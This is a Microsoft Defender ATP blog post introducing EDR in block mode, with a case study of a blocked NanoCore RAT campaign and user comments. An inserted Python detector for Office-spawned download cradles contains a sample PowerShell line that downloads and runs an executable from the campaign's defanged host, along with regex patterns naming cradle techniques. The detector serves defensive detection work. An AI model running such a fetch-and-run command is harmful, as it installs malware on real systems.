
Endpoint detection and response (EDR) in block mode is a new capability in Microsoft Defender Advanced Threat Protection (Microsoft Defender ATP) that turns EDR detections into blocking and containment of malicious behaviors. This capability uses Microsoft Defender ATP’s industry-leading visibility and detection capability to provide an additional layer of post-breach blocking of malicious behavior, malware, and other artifacts that your primary antivirus solution might miss.

Through built-in machine learning models in Microsoft Defender ATP, EDR in block mode extends behavioral blocking and containment, which uses machine learning-driven protection engines that specialize in detecting threats by analyzing behavior. The ability of this feature to detect and stop threats in real time, even after they have started running, empowers organizations to thwart cyberattacks, maintain security posture, and reduce the manual steps and time to respond to threats.

When EDR in block mode detects malicious behaviors or artifacts, it stops related running processes, blocking the attack from progressing. These blocks are reported in Microsoft Defender Security Center, where security teams can see details of the threat and remediation status, and use Microsoft Defender ATP’s rich set of capabilities to further investigate and hunt for similar threats as necessary.

Figure 1. Sample Microsoft Defender ATP alert on threat caught by EDR in block mode

EDR in block mode was developed in close collaboration with customers, and is in public preview starting today. We thank our customers for the partnership and for the invaluable feedback during the limited preview, during which the feature blocked multiple real-world attacks. In this blog, we’ll share details about one of these attacks.

EDR block mode in action

In April of this year, EDR in block mode protected against and blocked a NanoCore RAT attack that aimed to steal credentials, spy using a device’s camera, and pilfer other information. The attack started with a spear-phishing email carrying a malicious Excel attachment. The Excel file contained a malicious macro that, when enabled, ran PowerShell code that in turn downloaded and ran a file from hxxp://office-services-labs[.]com/Scan.exe.

Figure 2. Malicious Excel file used in NanoCore campaign

The organization’s non-Microsoft antivirus solution didn’t detect the Excel file or its behavior, but Microsoft Defender ATP did. EDR in block mode kicked in, stopping the download behavior and blocking the PowerShell code and Excel file. This was reported in the Microsoft Defender Security Center, alerting the security team about the blocked behavior. While the threat was automatically remediated, the alert empowers the security team to perform additional investigation and hunting for similar threats.

Figure 3. EDR in block mode alert in Microsoft Defender Security Center

Had the attack been allowed to continue, the downloaded file Scan.exe would have run the following PowerShell commands, which would have downloaded the payload, a NanoCore variant, from hxxp://paste[.]ee/r/Pym5k:

Figure 4. Malicious PowerShell commands used by NanoCore campaign

NanoCore is a family of remote access Trojans (RAT) that gather info about the affected device and operating system. It is designed to steal credentials, spy through cameras, and carry out other malicious activities. With EDR in block mode, Microsoft Defender ATP protected against the damaging impact of a successful NanoCore infection.

Figure 5. NanoCore RAT attack chain
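The attack chain above (Office document, macro-launched PowerShell with a download cradle, a dropped executable run from that shell) is the behavior an EDR would correlate before blocking. The following is an added example, not code from the post or from Microsoft Defender ATP: a small detector run over constructed process-creation events. The event fields, process IDs and command lines are assumptions modelled on the chain described, not real telemetry or Defender's schema.

```python
"""Flag the Office -> shell -> download -> execute chain over process events.
Added example; the ProcEvent layout and sample data are constructed."""
import re
from dataclasses import dataclass

# Office hosts that should rarely spawn a shell carrying a download cradle.
OFFICE_HOSTS = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe"}
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "mshta.exe"}
# Command-line markers typical of a PowerShell download cradle.
CRADLE = re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|"
                    r"Net\.WebClient|Start-BitsTransfer|-enc\w*\s", re.I)


@dataclass
class ProcEvent:
    pid: int
    ppid: int
    image: str      # basename of the executable
    cmdline: str


def find_cradle_chains(events):
    """Return (office_pid, shell_pid, [child_pids]) for every shell that an
    Office process spawned with a download cradle, together with whatever
    that shell launched afterwards (the Scan.exe stage in the post)."""
    by_pid = {e.pid: e for e in events}
    hits = []
    for e in events:
        parent = by_pid.get(e.ppid)
        if parent is None or parent.image.lower() not in OFFICE_HOSTS:
            continue
        if e.image.lower() not in SHELLS or not CRADLE.search(e.cmdline):
            continue
        children = [c.pid for c in events if c.ppid == e.pid]
        hits.append((parent.pid, e.pid, children))
    return hits


# Constructed sample events modelled on the chain in the post (not real data).
SAMPLE = [
    ProcEvent(100, 1, "explorer.exe", "explorer.exe"),
    ProcEvent(200, 100, "EXCEL.EXE", '"EXCEL.EXE" invoice.xlsm'),
    ProcEvent(300, 200, "powershell.exe",
              "powershell -w hidden -c (New-Object Net.WebClient).DownloadFile("
              "'hxxp://office-services-labs[.]com/Scan.exe',$env:TEMP+'\\Scan.exe')"),
    ProcEvent(400, 300, "Scan.exe", "C:\\Users\\u\\AppData\\Local\\Temp\\Scan.exe"),
    ProcEvent(500, 100, "powershell.exe", "powershell -c Get-Process"),  # benign
]

if __name__ == "__main__":
    for office, shell, kids in find_cradle_chains(SAMPLE):
        print(f"block candidate: Office pid {office} -> shell pid {shell} -> children {kids}")
```

The benign PowerShell launched from Explorer (pid 500) is not flagged, which is the point of keying on the parent process and the cradle together rather than on PowerShell alone.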

Turning on EDR in block mode

EDR in block mode is in public preview starting today, so if you have preview features turned on in Microsoft Defender Security Center, you can try it now. Once you’ve opted in, turning on EDR in block mode is simple. Go to Settings > Advanced features. Switch the toggle for “Enable EDR in block mode” to On.

Figure 6. Microsoft Defender Security Center Advanced features settings

Security teams are also informed about this feature via the security recommendation titled “Enable EDR in block mode” in threat and vulnerability management.

Figure 7. EDR in block mode in security recommendations

To learn more about the behavioral blocking and containment capabilities in Microsoft Defender ATP, watch this SANS Webcast, refer to our documentation, and read this blog.

If you’re not yet taking advantage of Microsoft’s industry-leading security optics and detection capabilities for endpoints, sign up for a free trial of Microsoft Defender ATP today.

We welcome your feedback. If you have any comments or questions, let us know.

Jeong Mun and Shweta Jha

Microsoft Defender ATP team

9 Comments
Occasional Contributor

This. Is. Awesome!

Occasional Contributor

Hi all,

I would like to ask one question about this feature - what if you're utilizing ASR rules in a strict way - Block Mode and very few exclusions - wouldn’t Exploit Guard have stopped this particular behavior explained in your blog post upfront? Would there be a chance of getting conflicts between the two block modes? Thank you

Microsoft

@Thomas Höhner - Thanks for posting your question, good one! At the moment you would need Microsoft Defender AV in Active mode to leverage ASR rules. The benefit of EDR in block mode is primarily focused (but not limited) on the situation where you are running some other AV as primary.

Occasional Contributor

Hi. Is there any way to enable this for a subset of endpoints? We would like to try it out on a device group before we enable it organization-wide (and this is required by change management). According to Endpoint detection and response in block mode - Windows security | Microsoft Docs, EDR block mode can only be enabled in Security Center - it would be great if we could configure it per group, like with automation levels.

Occasional Visitor

@Shweta Jha So this is for organisations that don't have Windows Defender as their primary antivirus?

Occasional Contributor

@Shweta Jha 

Hi,

Found this one in the MS docs - https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/edr-in-bl...

It clearly states that Defender and cloud protection must/should be up and running...

Didn't have much to deal with 3rd party AVs in the last few years, but we still have customers utilizing other AVs - so is it supported even without Defender AV or not?

Thank you for the clarification

Thomas

Microsoft

@PHancke Thanks for the feedback. Great suggestion, we will consider this while planning our roadmap. Will keep you posted.

Microsoft

@Peter_Kirk - Yes. You can turn on this feature to provide an additional layer of post-breach protection for devices that do not have Microsoft Defender AV as their primary AV. Please keep in mind that ideally we want our customers to be on the full MDATP stack (Defender AV as primary, plus EDR) to get the best protection, detection and response value. :)

Microsoft

@Thomas Höhner - when a 3rd party AV is installed and the device is onboarded to MDATP, Microsoft Defender AV automatically moves into passive mode (not performing active prevention and blocking). Defender AV needs to remain in passive mode with CDP to use this feature.